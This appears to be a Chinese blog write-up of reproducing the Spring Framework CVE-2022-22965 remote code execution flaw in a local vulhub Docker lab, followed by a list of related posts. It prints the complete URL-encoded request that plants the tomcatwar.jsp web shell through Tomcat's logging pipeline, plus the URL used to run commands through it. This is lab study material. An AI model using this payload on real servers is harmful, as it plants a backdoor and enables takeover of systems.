【vulhub系列】CVE-2022-22965 Spring Framework远程代码执行漏洞的复现

已于 2022-10-04 20:24:50 修改
阅读量1.8k 收藏 6
点赞数 1
分类专栏: 记录一下vulhub靶场复现 文章标签: 安全 网络安全
于 2022-08-12 10:46:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Wiofgb/article/details/126298131
版权

文章目录

前言

身为一个刚接触网络安全一年不到的新人,我打算记录一下每一次的漏洞复现希望能帮助到更多向我一样的新人。(因为技术有限,如果有做的不对的地方欢迎大佬们在评论区指正,感激不尽。顺便求个关注,谢谢)

提示:以下是本篇文章正文内容,下面案例可供参考

一、漏洞信息

漏洞名称:远程代码执行漏洞

危害等级:中危

漏洞类型:中间件漏洞

漏洞概述:参数绑定造成的变量覆盖漏洞,漏洞点spring-beans包中。Spring MVC 框架的参数绑定功能提供了将请求中的参数绑定控制器方法中参数对象的成员变量,通过 ClassLoader构造恶意请求获取AccessLogValue 对象并注入恶意字段值,来更改 Tomcat 服务器的日志记录属性触发 pipeline 机制写入任意路径下的文件。

二、环境搭建

三、进行漏洞复现

1、进入打开终端,进入目标路径下: 

cd vulhub-master/spring/CVE-2022-22965/

2、打开docker容器:

docker-compose up -d

3、查看开启端口和本机IP:

docker ps        #查看开启端口

ifconfig         #查看本机IP

查看开启端口:

查看ip:

查看环境搭建是否成功:http://192.168.162.129:8080

搭建成功显示的页面如下

POC:

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1

suffix: %>//
c1: Runtime
c2: <%
DNT: 1

打开抓包工具抓取靶场页面的数据包:并将poc添加进去:

访问:

http://192.168.162.129:8080/tomcatwar.jsp?pwd=j&cmd=id

成功页面:

记录一次vulhubSpring Framework远程代码执行漏洞复现CVE-2022-22965
sszsNo1的博客
06-29 246
vulhubSpring Framework远程代码执行漏洞复现CVE-2022-22965
CVE-2022-22965Spring远程代码执行漏洞
m0_67392273的博客
07-31 412
先自我介绍一下,小编13年上师交大毕业,曾经在小公司待过,去过华为OPPO等大厂,18年进入阿里,直到现在。SpringframeworkSpring里面的一个基础开源框架,其目的是用于简化Java企业级应用的开发难度和开发周期,2022年3月31日,VMwareTanzu发布漏洞报告,SpringFramework存在远程代码执行漏洞,在JDK9+上运行的SpringMVC或SpringWebFlux应用程序可能容易受到通过数据绑定的远程代码执行(RCE)的攻击。...
Spring Framework远程代码执行漏洞_CVE-2022-22965复现
beichenyyds的博客
04-07 3956
1. 漏洞介绍 Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为 J2EE 应用程序开发提供了一个好用的框架。当Spring部署在JDK9及以上版本,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。 2、受影响版本 Spring Core <= 5.2.19, <= 5.3.17 Spring Boot <= 2.6.5 3、利用前提 JDK 9 及以上版本 Spring框架的5.3.0
Spring框架常见漏洞
最新发布
本散修的一些学习心得与笔记,道友请自便。
09-17 924
本篇文章主要是内容常见Spring漏洞的解析以及理解。
CVE-2022-22965 漏洞复现
Ethan_cfq的博客
04-13 320
执行格式 :python3 Spring_vulhub_CVE-2022-22965_poc.py --url=url:pro。此时已将tomcat的日志存储位置已修改为:tomcatwar.jsp,此文件是小马文件,可执行远程命令。拉取cve-2022-22965环境(vulhub拉去环境并打开漏洞环境)在靶场环境搭建可访问的情况下,运行python文件,可直接进行远程命令执行。此时我们可以正常访问页面,说明我们的靶场环境可以使用。访问靶场环境是否可正常访问。此时,手工漏洞复现结束。
spring framework漏洞复现
m0_56135391的博客
04-12 1824
1.在vulfocus平台启动spring framework漏洞环境 2.使用安装有python3环境的机器对该靶场进行漏洞验证,此处使用kali进行攻击,命令为python3 poc文件 -- url 目标地址3.漏洞验证 poc(python文件) #coding:utf-8 import requests import argparse from urllib.parse import urljoin def Exploit(url): headers = {"suffix":"%
CVE-2022-22965漏洞复现
Foreverlove112的博客
10-01 500
CVE-2022-22965漏洞复现
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
qq_52671379的博客
04-12 2726
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
CVE-2022-22965Spring远程代码执行漏洞复现
精品博客,你值得一看~
03-15 1563
由于Spring框架历史漏洞修复代码存在缺陷,在 JDK 9 及以上版本环境下,远程攻击者可借助Tomcat中间件构造数据包修改日志文件,从而可在任意路径下写入Webshell等恶意文件,最终可导致执行任意代码控制服务器等危害。Spring框架(Framework)是一个开源的轻量级J2EE应用程序开发框架,提供了IOC、AOP及MVC等功能,解决了程序人员在开发中遇到的常见问题,提高了应用程序开发便捷度和软件系统构建效率。4.使用 spring-webmvc 或 spring-webflux 的依赖。
CVE-2022-22965 Spring Framework远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-14 3183
springframeworkspring 里面的一个基础开源框架,主要用于javaee的企业开发。Spring是什么呢?首先它是一个开源的项目,而且非常活跃;它是一个基于IOC和AOP的构架多层j2ee系统的框架,但它不强迫你必须在每一层中必须使用Spring,因为它模块化的很好,允许你根据自己的需要选择使用它的某一个模块;
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
weixin_45715461的博客
07-11 3349
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
Spring RCE 漏洞 CVE-2022-22965复现分析
m0_61506558的博客
09-19 5705
关于CVE-2022-22965漏洞的环境调试和内容,网上看了一波,感觉有些知识点内容还是必须要了解才能理解该漏洞,为此详细写了下从Spring框架结构分析,环境搭建到漏洞分析调试整体的一个过程理解,在遇到其他类型的漏洞也可以去调试运用。(一)了解Spring框架由于本文主要介绍漏洞原理流程,所以有关框架不会具体展开,会将涉及到的内容进行解释。1、
CVE-2022-22965复现
lionwerson的博客
06-10 409
简介:在jdk 9+上运行的Spring MVC或Spring WebFlux application可能会导致RCE复现环境: 服务启动后,访问 即可看到一个演示页面。poc:使用方法:-t 输入目标地址,-c输入执行命令,默认为id
CVE-2022-22965 Spring远程代码执行漏洞复现
weixin_45260839的博客
05-22 4001
CVE-2022-22965 Spring远程代码执行漏洞复现
漏洞复现CVE-2022-22965 Spring Framework远程代码执行漏洞
m0_53121608的博客
07-16 256
服务启动后,访问http://your-ip:8080/?name=Steve&age=25即可看到一个演示页面。
CVE-2022-22965Spring Framework复现
kriesa的博客
07-13 1004
CVE-2022-22965Spring Framework复现
CVE-2022-22965分析复现
include_voidmain的博客
04-12 3644
0x01 前置知识 Introspector类 javabean通常是用来做数据封装的java类,为了方便数据的读取与写入,会有getter/setter方法来对数据进行操作,在jdk中有一个Introspector类,通过该类的方法可以获取javabean的相关信息,包括javabean中的属性值,以及属性值对应的getter/setter方法。 对于属性的获取,其实是通过对应的getter/setter方法来确定的,如果存在对应的getter/setter方法或其中的一个,都会认为存在对应的属性,下面通
CVE漏洞复现-CVE-2022-22965-Spring-RCE漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-11 2038
Spring frameworkSpring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行 (RCE) 的攻击。受影响范围:JDK >= 9不受影响的版本JDK < 9。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值